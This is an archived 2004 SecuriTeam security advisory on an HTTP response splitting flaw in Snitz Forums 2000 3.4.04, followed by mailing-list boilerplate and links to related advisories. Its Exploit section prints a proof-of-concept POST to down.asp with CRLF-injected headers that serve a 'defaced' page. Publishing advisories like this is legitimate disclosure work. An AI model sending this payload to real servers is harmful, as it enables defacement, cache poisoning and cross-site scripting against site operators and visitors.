[UNIX] Snitz Forums 2000 HTTP Response Splitting
From: SecuriTeam (support_at_securiteam.com)
Date: 09/19/04
- Previous message: SecuriTeam: "[NEWS] Engenio/LSI Logic Controllers DoS/Data Corruption"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Sep 2004 16:13:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Snitz Forums 2000 HTTP Response Splitting
------------------------------------------------------------------------
SUMMARY
<http://forum.snitz.com/> Snitz Forums 2000 is "an interactive discussion
environment that allows different people on the Internet or an Intranet to
leave messages for each other, and then reply".
An HTTP Response Splitting vulnerability in the product has been found,
this allows remote attackers to preform several types of attacks against
the server, web cache poisoning and cross site script, to name a few.
DETAILS
Vulnerable Systems:
* Snitz Forums 2000 version 3.4.04
Exploit:
Sending the following request can illustrate the issue:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html
%0d%0a%0d%0a{html}defaced{/html}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:maestrodeseguridad@lycos.com> Maestro De-Seguridad.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Engenio/LSI Logic Controllers DoS/Data Corruption"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] sh-httpd Wildcard Character Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in the
product allows remote attackers to ... By requesting a filename from a remote host
and inserting a wildcard ... (Securiteam) - [NT] Cross Application Scripting in Trend Micros Antivirus Software
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The SecuriTeam alerts
list - Free, Accurate, Independent. ... When the product alerts the user of a possible virus,
it creates an HTML ... (Securiteam) - [NT] Microsoft Windows NTFS Improper Handler Closing
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system
shutdown, uninitialized data may be visible in files from ... (Securiteam) - [EXPL] QK SMTP DoS (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... QK SMTP DoS ...
static char overflow; ... (Securiteam) - [TOOL] tcpstatflow - Covert Tunnel Detector
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... For example, he could set
up a SSH server on the Internet, listening port ... one way and the opposite (within a
single TCP connection). ... (Securiteam)
